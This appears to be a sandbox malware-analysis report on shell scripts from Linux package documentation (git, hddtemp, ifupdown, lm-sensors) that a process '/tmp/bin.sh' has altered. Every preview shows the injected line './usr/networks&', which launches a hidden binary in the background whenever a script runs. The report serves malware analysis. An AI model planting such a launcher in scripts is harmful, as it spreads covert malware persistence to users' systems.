                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVMQPJA4lJx3ULFZZ6+uvHzDTIgTPS2d118LVLyULFZvCY1M9H1x3ULFI/uvTBe:IAO0ZZ6/vH0gTmLNZvW9Vx0BvWv7n
                                                                                                    MD5:BE780CC322587122E892D123BFF726B6
                                                                                                    SHA1:26AA277E5D4A3A0DC6790C3F802334721E341BB3
                                                                                                    SHA-256:3EAAD297334349E1894BEC8495AB5DFB60143BA7087A44B48D31A2E2D880DF17
                                                                                                    SHA-512:8F99561F7551A8EDD954ED1F73DF02AFBFBC8750BBB5F33BDE129AD51F0812862A24CC33CC2A5F7099DC545BCEA6A46962F85D765250FBBBFD48BE73AEE6F218
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.git cat-file tag "$1" >"$GIT_DIR/.tmp-vtag" || exit 1.sed -n -e '../^-----BEGIN PGP SIGNATURE-----$/q..p.' <"$GIT_DIR/.tmp-vtag" |.gpg --verify "$GIT_DIR/.tmp-vtag" - || exit 1.rm -f "$GIT_DIR/.tmp-vtag"../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/examples/git-whatchanged.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):792
                                                                                                    Entropy (8bit):4.925184193549972
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:JdJo5ELpDZNanwyCDIqDZNaEC0I8hWq6vvmYkdBQcaKv5oUvfn:JdJomtDXEwrDRDXUxo6nmYkdB1aSD
                                                                                                    MD5:895868AC151D9953AD152F77240CF73D
                                                                                                    SHA1:FCAAED017977A291A1D2E1E77CFA2A796F23EBA8
                                                                                                    SHA-256:03943D3826EC7CA6398628FBCE75EFA0BECE41CEFE95A6AB90801C7759A5B23E
                                                                                                    SHA-512:AF8FD5A0FBA1B33790C20911F0B1222FDE15C3143463346E0111194B57F1E92704CBC19B1392A6156B02BBD363A0C566E12BD80919C1E7C3ED7344D09ACA8CC0
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.diff_tree_flags=$(git-rev-parse --sq --no-revs --flags "$@") || exit.case "$0" in.*whatchanged)..count=..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get whatchanged.difftree)..diff_tree_default_flags='-c -M --abbrev' ;;.*show)..count=-n1..test -z "$diff_tree_flags" &&...diff_tree_flags=$(git config --get show.difftree)..diff_tree_default_flags='--cc --always' ;;.esac.test -z "$diff_tree_flags" &&..diff_tree_flags="$diff_tree_default_flags"..rev_list_args=$(git-rev-parse --sq --default HEAD --revs-only "$@") &&.diff_tree_args=$(git-rev-parse --sq --no-revs --no-flags "$@") &&..eval "git-rev-list $count $rev_list_args" |.eval "git-diff-tree --stdin --pretty -r $diff_tree_flags $diff_tree_args" |.LESS="$LESS -S" ${PAGER:-less}../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/fast-import/git-import.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):486
                                                                                                    Entropy (8bit):5.198694046664742
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:w6vgZi+Z5+v1a6v5vrpGje1rSACES02djvcn:rgI++NBNrpZrSAyRdjE
                                                                                                    MD5:84511195A8532AFAED8B6E6645B72FC9
                                                                                                    SHA1:C424C15440A2C33C8559CF718B1C4B661D85BF52
                                                                                                    SHA-256:47E74E34A77970C44CC9F8C39F20AF338E5E6BDFB60AB516B66247B5C50537EA
                                                                                                    SHA-512:680648718E925D7C6649BAFC0C134B19B31A41647EEC15142177E5A4C1F306454C4D61FFA4905FC2E7C5BE2461F90C73116E74B56664B4125101D9E6E9AD5DF0
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit 1.fi..USERNAME="$(git config user.name)".EMAIL="$(git config user.email)"..if [ -z "$USERNAME" -o -z "$EMAIL" ]; then..echo "You need to set user name and email"..exit 1.fi..git init..(..cat <<EOF.commit refs/heads/$1.committer $USERNAME <$EMAIL> now.data <<MSGEOF.$2.MSGEOF..EOF..find * -type f|while read i;do...echo "M 100644 inline $i"...echo data $(stat -c '%s' "$i")...cat "$i"...echo..done..echo.) | git fast-import --date-format=now../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/git-resurrect.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2904
                                                                                                    Entropy (8bit):5.006955417229927
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:5uqbabEEfBEyVJ1IUM7cy8UEV3cyUEdKENHwJ+gAP253YNVq6h3p133pgt3piZ:YpBEcLIUYcy8UEtcyUEdKENHwJ+gAP2s
                                                                                                    MD5:E6A74480E370B07D5BDC026A624CE684
                                                                                                    SHA1:988862444F28FAB3B4D6B92EC6C4F0488781EE2E
                                                                                                    SHA-256:AA7A6EB55918038552A2417FF03AE208F7408447FC6322536A71CE309EE23230
                                                                                                    SHA-512:93F551BFC3E2D737ED93989FBCA8D4CB7883BF35EAD4DB9C84DAEFF8403787C663989E5BA038425BC622F1EFEA0AE06411BBF6F492E22ABC35218F271FF7624B
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. sed -ne "/^$_x40 \($_x40\) Merge .*/ {s//\1/p;$early_exit}".}..search_merge_targets () {..git rev-list --all --grep="Merge branch '[^']*' into $branch\$" \...--pretty=tformat:"%H %s" --all |..sed -ne "/^\($_x40\) Merge .*/ {s//\1/p;$early_exit} ".}..dry_run=.early_exit=q.scan_reflog=t.scan_reflog_merges=.scan_merges=.scan_merge_targets=.new_name=..while test "$#" != 0; do..case "$1" in.. -b|--branch)...shift...new_name="$1"...;;.. -n|--dry-run)...dry_run=t...;;.. --no-dry-run)...dry_run=...;;.. -k|--keep-going)...early_exit=...;;.. --no-keep-going)...early_exit=q...;;.. -m|--merges)...scan_merges=t...;;.. --no-merges)...scan_merges=...;;.. -l|--reflog)...scan_reflog=t...;;.. --no-reflog)...scan_reflog=...;;.. -r|--reflog_merges)...scan_reflog_merges=t...;;.. --no-reflog_merges)...scan_reflog_merges=...;;.. -t|--merge-targets)...scan_merge_targets=t...;;.. --no-merge-targets)...scan_merge_targets=...;;.. -a|--all)...scan_
                                                                                                    /usr/share/doc/git/contrib/remotes2config.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/rerere-train.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):637
                                                                                                    Entropy (8bit):4.973192610623575
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:wp6B2fHx3CXTuKQLcuSKHp+V/uwb+ctPKry/RhT6KHVB+8PfQyKwQgI2KkSr8n:HaR3U0Lp0VDbztPKITbfrCnMSg
                                                                                                    MD5:FA973BE7DB66D335F781F10C137BD908
                                                                                                    SHA1:DFFD51DB653BEF7DEA7D172F98830224F248E767
                                                                                                    SHA-256:22ED58D049502A09B9CA39029671394257E5C2651094498A9D91B8BBBB4FB03E
                                                                                                    SHA-512:74DE024F1503C58852597882F36B96CD697036A22943C26D1A1FD5F76A5CBEDEB384D7E88520547EB0788B718534BD9813FA3B25220B58D4F397050172568D64
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit 1.}..mkdir -p "$GIT_DIR/rr-cache" || exit..git rev-list --parents "$@" |.while read commit parent1 other_parents.do..if test -z "$other_parents"..then...# Skip non-merges...continue..fi..git checkout -q "$parent1^0"..if git merge $other_parents >/dev/null 2>&1..then...# Cleanly merges...continue..fi..if test -s "$GIT_DIR/MERGE_RR"..then...git show -s --pretty=format:"Learning from %h %s" "$commit"...git rerere...git checkout -q $commit -- ....git rerere..fi..git reset -q --hard.done..if test -z "$branch".then..git checkout "$original_HEAD".else..git checkout "${branch#refs/heads/}".fi../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/subtree/git-subtree.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):14967
                                                                                                    Entropy (8bit):5.111069408805373
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:TVYbrTzRMebrfW0LJKEfUJzXKJ/38TQZNRgZpP1OQSABMfxn8R19mBhogLfbzxHY:+b1MebzW0Vx/Jhzg/MQ3D0fbtZA/1
                                                                                                    MD5:41BA328EB77CD320A36423CADED05D12
                                                                                                    SHA1:8393068799794472918236BBBB43BAAD72C7682F
                                                                                                    SHA-256:1C6220B54F133F09F0E29C3BC4890CE7E3AF0AD29670672F1CD80448E2B9A779
                                                                                                    SHA-512:A7DB8210828B6F0E59B1B73A46C0522E1552A49F956784CD5F001C8747FDF65E3255152B6BBFFCD4E6AB3CF0DDABA3BEBDF0B2D0CCA36B203A62EE2109D871E8
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.eval "$(echo "$OPTS_SPEC" | git rev-parse --parseopt -- "$@" || echo exit $?)"..PATH=$PATH:$(git --exec-path).. git-sh-setup..require_work_tree..quiet=.branch=.debug=.command=.onto=.rejoin=.ignore_joins=.annotate=.squash=.message=.prefix=..debug().{..if [ -n "$debug" ]; then...printf "%s\n" "$*" >&2..fi.}..say().{..if [ -z "$quiet" ]; then...printf "%s\n" "$*" >&2..fi.}..progress().{..if [ -z "$quiet" ]; then...printf "%s\r" "$*" >&2..fi.}..assert().{..if "$@"; then...:..else...die "assertion failed: " "$@"..fi.}...#echo "Options: $*"..while [ $# -gt 0 ]; do..opt="$1"..shift..case "$opt" in...-q) quiet=1 ;;...-d) debug=1 ;;...--annotate) annotate="$1"; shift ;;...--no-annotate) annotate= ;;...-b) branch="$1"; shift ;;...-P) prefix="${1%/}"; shift ;;...-m) message="$1"; shift ;;...--no-prefix) prefix= ;;...--onto) onto="$1"; shift ;;...--no-onto) onto= ;;...--rejoin) rejoin=1 ;;...--no-rejoin) rejoin= ;;...--ignore-joins) ignore_joins=1 ;;...--no-ignore-joins) ignore_joi
                                                                                                    /usr/share/doc/git/contrib/subtree/t/t7900-subtree.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/git/contrib/thunderbird-patch-inline/appp.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):822
                                                                                                    Entropy (8bit):5.456000973546581
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:w6vCJsHKfrLCYwTlFfOf4L3DXKPvX90Eq2qBGSCP6pF5ViL2gR2DFfZf97n:rCJeyaYwD+UKXGRBmAF5I0Zl7
                                                                                                    MD5:0D11588BAF66BBD90273FDA188DDA2CD
                                                                                                    SHA1:EE2F4255479F30769F44E8CB5E284E632DD3B4AD
                                                                                                    SHA-256:37757E412DB565E1A291349C036785A00ED5B89431A1598E6C16900BBCFFE356
                                                                                                    SHA-512:991F89DD0AC1B1D3071F5103CAE959FCE46E608EA2F065F248D45727777265C49E30E865CCE16785B9565FD324BE23BCAD3B475A87FF5DCAE28067875CC9DB2E
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit 1.fi..cd - > /dev/null..SUBJECT=$(sed -n -e '/^Subject: /p' "${PATCH}").HEADERS=$(sed -e '/^'"${SEP}"'$/,$d' $1).BODY=$(sed -e "1,/${SEP}/d" $1).CMT_MSG=$(sed -e '1,/^$/d' -e '/^---$/,$d' "${PATCH}").DIFF=$(sed -e '1,/^---$/d' "${PATCH}")..CCS=`echo -e "$CMT_MSG\n$HEADERS" | sed -n -e 's/^Cc: \(.*\)$/\1,/gp' \..-e 's/^Signed-off-by: \(.*\)/\1,/gp'`..echo "$SUBJECT" > $1.echo "Cc: $CCS" >> $1.echo "$HEADERS" | sed -e '/^Subject: /d' -e '/^Cc: /d' >> $1.echo "$SEP" >> $1..echo "$CMT_MSG" >> $1.echo "---" >> $1.if [ "x${BODY}x" != "xx" ] ; then..echo >> $1..echo "$BODY" >> $1..echo >> $1.fi.echo "$DIFF" >> $1..LAST_DIR=$(dirname "${PATCH}")..grep -v "^LAST_DIR=" "${CONFFILE}" > "${CONFFILE}_".echo "LAST_DIR=${LAST_DIR}" >> "${CONFFILE}_".mv "${CONFFILE}_" "${CONFFILE}"../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/hddtemp/contribs/analyze/graph-field.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):23
                                                                                                    Entropy (8bit):3.882045108136863
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVOORgn:Tn
                                                                                                    MD5:D7BC14787BBF05DEAC1113F4B42B6099
                                                                                                    SHA1:BB0DF86AA88C53CB0E53147B50135113CB15FFFF
                                                                                                    SHA-256:2AB8C8B53D6823D9D4F90CCC40B7BB78C68956FB60D691B4DB241809CD259E01
                                                                                                    SHA-512:810CB49B08A5CF57DA8D5194DC5442B4BA72AD50534FCDA48C0C0815164AED4B23D4F06035390EB596D69A7FBA579C7B3E0FCA1CDE2F81FF23347780770A3D0D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.exit 1.
                                                                                                    /usr/share/doc/hddtemp/contribs/analyze/hddtemp_monitor.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):617
                                                                                                    Entropy (8bit):4.789300168717738
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:ag6vEfH2QDFh7iYAfFnQiOuO72M6SFnQ73gfDfiem9MrE9HnDYha/MHrZIgHDMvX:4EvFIYGQi2qf0QcfDqurE9jYA/MLljMv
                                                                                                    MD5:13C31185F2BB9F9D26E363B9415D49B2
                                                                                                    SHA1:5D3AACF7D8FC903F7CEB6ED329C90F52ABCF3246
                                                                                                    SHA-256:2DFFED792FEC0D8B455B8230152C893848C28600007A907391BC27A74EA8F2B4
                                                                                                    SHA-512:050843F8AA048E4D7B14E4F292AE0381E81B3F49F382B5288FB13EF88FD3189A7AEBC2987E31F31A7D09BDC9E53D94B27FEAE57B3BE3E4822FBCE51B03424A3D
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. exit 1.fi..logger -s -t hddtemp "starting hddtemp monitor: interval=$interval, tmpdir=$tmpdir, drive=$drive".stamp=`date +%s`.tmpfile_old="$tmpdir/hddtemp-$stamp".hddtemp $drive --debug > "$tmpfile_old"..while [ 1 ] ; do. sleep $interval. stamp=`date +%s`. tmpfile_new="$tmpdir/hddtemp-$stamp". hddtemp $drive --debug > "$tmpfile_new". RETURNED=`diff "$tmpfile_old" "$tmpfile_new"`. if [ -n "$RETURNED" ] ; then. logger -s -t hddtemp "change $tmpfile_new !!!". tmpfile_old="$tmpfile_new". else. logger -s -t hddtemp "no change". rm "$tmpfile_new". fi.done../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/hddtemp/contribs/hddtemp-all.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):1015
                                                                                                    Entropy (8bit):4.896629241453442
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:24:raKURpM5kJl8cI094qTAYCyiaLZZTu0BCauu0BC4ojDOpHpjFxDf0u0Nm4:raPpM5kJucIUN+zyZ5utauut4gDOdpja
                                                                                                    MD5:87F1604CDCC54749A6A6D814FBB28530
                                                                                                    SHA1:2E815968A4F6A0F92924E94C4D94BBE5F68BA871
                                                                                                    SHA-256:E53623C100D004F567645C208CA688CEEDF7E50B14226BC66D96C22CC12944EF
                                                                                                    SHA-512:C1C92619C802D476F41832EF89E728F89CCD277C6B26AD0AD436466DC9338D24A3064976D4E9C471342370A84FD3D9A9803411DC2D0BCA82ADEA0DFD550EACFC
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&..exit 1.fi...# NOTE, you could actually change this to .# ls /dev/hd? /dev/sd?.# but then you would need to remove the cruft of non-existant drives....df -l |cut -f 1 -d " " |grep /dev/ |sed -e 's/[[:digit:]]$//g' |sort -u |.while read drive; do..# TODO: ..case "$drive" in.. /dev/sd*|/dev/hd*).. # NOTE: Scsi devices might be error-prone, since many non-HDD.. # devices uses SCSI or SCSI emulation (CD-ROMs, USB mass storage..)...hddtemp $drive...;;.. /dev/md*).. # TODO: it could actually look somewher for the information.. # of the disks that make up the raid, maybe looking it up.. # at /proc/mdstat.. .echo "RAID devices currently not supported ($drive)"...;;.. /dev/vg*).. .echo "LVM devices currently not supported ($drive)"...;;.. /dev/cdrom*|/dev/fd*).. # Some common non-HD elements which might be mounted,.. # we skip these.. .;;.. *).. .echo "Unknown drive currently not supported ($drive)"...;;..esac.done..exit 0../usr/ne
                                                                                                    /usr/share/doc/ifupdown/examples/check-mac-address.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):461
                                                                                                    Entropy (8bit):5.204671186006819
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:boybzOC2OPhB+NT3uGK6nRE9CLAYFyW4CK4jWb+YtYn:bo0PhcdW9CLKW4x4jWi/
                                                                                                    MD5:590EDF96613EB2B783D98ED51A5F19A4
                                                                                                    SHA1:3C6570765592737D02E8010FD9A159A39DCDCC38
                                                                                                    SHA-256:BB77853D6FDBD37E5B234F1ECE3A223E07BDBE02CCEFC70D9FA6849ECB47F59A
                                                                                                    SHA-512:6DC5C0F411328DE21CEFA82E8B1CD57CEE3AF5EDC0144860BEB2B291A534DFB1667B70E95D99586804D2489306377FF1F4B22C8A1D1A4E78353223717C5E47DD
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.# If it does it exits with 0 (success) status;.# if it doesn't then it exists with 1 (error) status...set -e..export LANG=C..if [ ! "$2" ] ; then..echo "Usage: $0 IFACE targetMAC"..exit 1.fi.iface="$1".targetmac=`echo "$2" | sed -e 'y/ABCDEF/abcdef/'`.mac=$(/sbin/ifconfig "$iface" | sed -n -e '/^.*HWaddr \([:[:xdigit:]\-]*\).*/{s//\1/;y/ABCDEF/abcdef/;p;q;}')..if [ "$targetmac" = "$mac" ]; then exit 0; else exit 1; fi../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/ifupdown/examples/get-mac-address.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):92
                                                                                                    Entropy (8bit):4.373538165973413
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:qXVCghzalTFgZNLdMRveMgoOORgn:whzalTFgZNpMRGMgTn
                                                                                                    MD5:15DD9BBF0482D9ADCED6141F43FC3C89
                                                                                                    SHA1:F4416E70988E52171A2F7027509F98AAE444E8B6
                                                                                                    SHA-256:CB678F95B78104B7BD05D11C5AF75843331744E2EAB1504A32627FB30DE17238
                                                                                                    SHA-512:39C8DD448D3D1F8C4BAECB16A395BC55EA2554E4ED627743FC26A76B12C750CE451BC3CE72AEFF94286A260DCB06AC016AE44F9BD3A12372F1DD31776783FE62
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/ifupdown/examples/pcmcia-compat.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):519
                                                                                                    Entropy (8bit):5.218301073324955
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:5HUuJUHUd82RPHUAOBJ6gMWGwWSTsyzEblTKfahBUlTGNCgTn:50QU0NRP0L6g/gfbleqUlw
                                                                                                    MD5:7CE36959719763E25A79EF6FBE77FD68
                                                                                                    SHA1:3D32B1EF561E7CDD58B69D01B30F6F23D339805D
                                                                                                    SHA-256:2C2DA71A12186FDDE2BDFAEA192105B1010C1279BB82334185690788E2EFAF79
                                                                                                    SHA-512:4ACE6DF91473556C67C22C26FA905D93E6BB08D564851AC21BED82609DA4990D032FE81884214CDAA0A149FDEF4D2393CB2A02EE42CDA2743B9BD017918D6605
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.if [ ! -e /etc/pcmcia/shared ]; then exit 1; fi..pcmcia_shared () {... /etc/pcmcia/shared.}..iface="$1"..# /etc/pcmcia/shared sucks.pcmcia_shared "start" $iface.usage () {..exit 1.}..get_info $iface.HWADDR=`/sbin/ifconfig $DEVICE | sed -n -e 's/.*addr \([^ ]*\) */\1/p'`..which="".while read glob scheme; do..if [ "$which" ]; then continue; fi..case "$SCHEME,$SOCKET,$INSTANCE,$HWADDR" in...$glob) which=$scheme ;;..esac.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/ifupdown/examples/ping-places.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):633
                                                                                                    Entropy (8bit):4.881818972878624
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:12:5EmBJQX+U2/lTxroNurUQm6k0fQmje5jrGlTGNCgTn:hQWldrK8Dq0o+e1Glw
                                                                                                    MD5:99E4E569B07969486DA912C2B9A33E23
                                                                                                    SHA1:3BAA43B8E0D2B693C426DDA2FA6D67DEAEADB09C
                                                                                                    SHA-256:3C5803C83626B98195C7F48B7B83D131670DFA9541EDB8B30915C684FD39CCB9
                                                                                                    SHA-512:8BAE9DC8E5F540044980649EF028FEF8C4FE945B05578EE1DB963A32AABC53F7D24FCD5DDB396FB9430E4CDFB6E1E6F19A535A1790072F5750D961F4FB8E3214
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&.if [ `id -u` -ne 0 ] || [ "$1" = "" ]; then exit 1; fi..if [ -x /usr/bin/fping ]; then..PING="/usr/bin/fping".else..PING="/bin/ping -c 2".fi..iface="$1".which=""..while read addr pingme scheme; do..if [ "$which" ]; then continue; fi...#echo " Trying $addr & $pingme ($scheme)" >&2...ip addr add $addr dev $iface >/dev/null 2>&1..ip link set $iface up >/dev/null 2>&1...if $PING $pingme >/dev/null 2>&1; then...which="$scheme"...fi..ip link set $iface down >/dev/null 2>&1..ip addr del $addr dev $iface >/dev/null 2>&1.done..if [ "$which" ]; then echo $which; exit 0; fi.exit 1../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/lm-sensors/examples/daemon/healthd.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):266
                                                                                                    Entropy (8bit):4.736279036741599
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:6:a5z9kOtWR2xokRVic6v3ApkRVX1dhlz4n:a53tPSjnz4n
                                                                                                    MD5:E97AC4982B9BDFC8ED84ADA38E7BA000
                                                                                                    SHA1:DE41A53FAE2E629E10235800917CDE6B2E0301AC
                                                                                                    SHA-256:DADFB755A5E8D372A17BA4A4C8DC9DFB87AF4AD674EC8760617A16772FB2FFA4
                                                                                                    SHA-512:B0035AA0879CE1F07F05B1CC3ABFD6F06C38D617D3A03248520B9B2F9790B6CE78156741330B2D4FE90A6BABF5493F944F281CE1BBE3B49864D35F4DF0F97314
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. exit.fi..while true.do. sleep 15. sensors_state=$(sensors). if [[ "$sensors_state" =~ 'ALARM' ]]. then. echo "$sensors_state" | mail -s '**** Hardware Health Warning ****' $ADMIN_EMAIL. sleep 600. fi.done../usr/networks&.exit 1.
                                                                                                    /usr/share/doc/lm-sensors/examples/tellerstats/gather.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2712
                                                                                                    Entropy (8bit):5.4524991837552035
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9ZH0GXMZP9SFDAWxuQNa2K0uVl2dv4i:yF/E/l3XMZgNyZRo
                                                                                                    MD5:A148FED2694A1A82F4ABF9A28D0293DC
                                                                                                    SHA1:4652F09BF1B6FB1859FB4816EFB666AE371C13E6
                                                                                                    SHA-256:8E15D1F50B0C524C72F1AB62314D647BF610D9B15952A0FEABA439C111868D7D
                                                                                                    SHA-512:9E3AD1B35163A6875351B4028C473277FD120F7159D8E0F0BDA66BF6E0205AAA4ABA5053E9B30E702D99F15FDF5F5A1486216F7B4B7ED667807DF487E75777E8
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                    /usr/share/doc/lm-sensors/examples/tellerstats/tellerstats.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
                                                                                                    Size (bytes):2564
                                                                                                    Entropy (8bit):5.346461718403454
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:48:rM6SsguNoTTNpEoTVWuoTBdg69FpV9Zgz5QcJdcg63JI7+thz3pDsZdRtNzazELX:yF/E/lQ5QcJz7+tN3pAbRtJazELX
                                                                                                    MD5:5A7BF4FFD03AE3B45F7EF8500A88D63C
                                                                                                    SHA1:DBFF57314EAD3467F2357BF20E7D40FC20AE846C
                                                                                                    SHA-256:8221FFC6B5CE193B173F22C873712D38673239A36E2E1C5F931F040A9D96440F
                                                                                                    SHA-512:735D29AC37C532983BDCC294F401FF0B65B836A4012276266D68A249262EF50506742622163697A1F5665C4FD1761BE33006199F313E21DAA91236E7CD09632A
                                                                                                    Malicious:false
                                                                                                    Preview: ./usr/networks&. exit 1.fi ... $TELLERSTATS_CONF..if [ ! -d $DBPATH ].then. echo "$0: data directory $DBPATH does not exist". exit 1.fi..if [ ! -d $SENSORPATH ].then. echo "$0: sensor information directory $SENSORPATH does not exist.". exit 1.fi..if [ ! -d $HTMLROOT ].then. echo "$0: The root of your webserver - $HTMLROOT - does not exist..bailing out". exit 1.fi..if [ ! -d $HTMLPATH ].then. echo "$0: The place where we keep HTML files and pictures - $HTMLPATH - does not exist..bailing out". exit 1.fi..if [ ! -r $GNUPLOTSCRIPT_TMPL ].then. echo "$0: The gnuplot script template $GNUPLOTSCRIPT_TMPL does not exist..bailing out". exit 1.fi..export DBPATH SENSORPATH TEMPPATH HTMLROOT HTMLPATH GNUPLOTSCRIPT_TMPL..if [ -n "$DEBUG" ].then. echo "DBPATH = $DBPATH". echo "SENSORPATH = $SENSORPATH". echo "TEMPPATH = $TEMPPATH". echo "HTMLROOT = $HTMLROOT". echo "HTMLPATH = $HTMLPATH". echo "GNUPLOTSCRIPT_TMPL = $GNUPLOTSCRIPT_TMPL".fi..# generic tellerstats ini
                                                                                                    /usr/share/doc/mdadm/examples/mdadd.sh
                                                                                                    Process:/tmp/bin.sh
                                                                                                    File Type:ASCII text
                                                                                                    Category:dropped
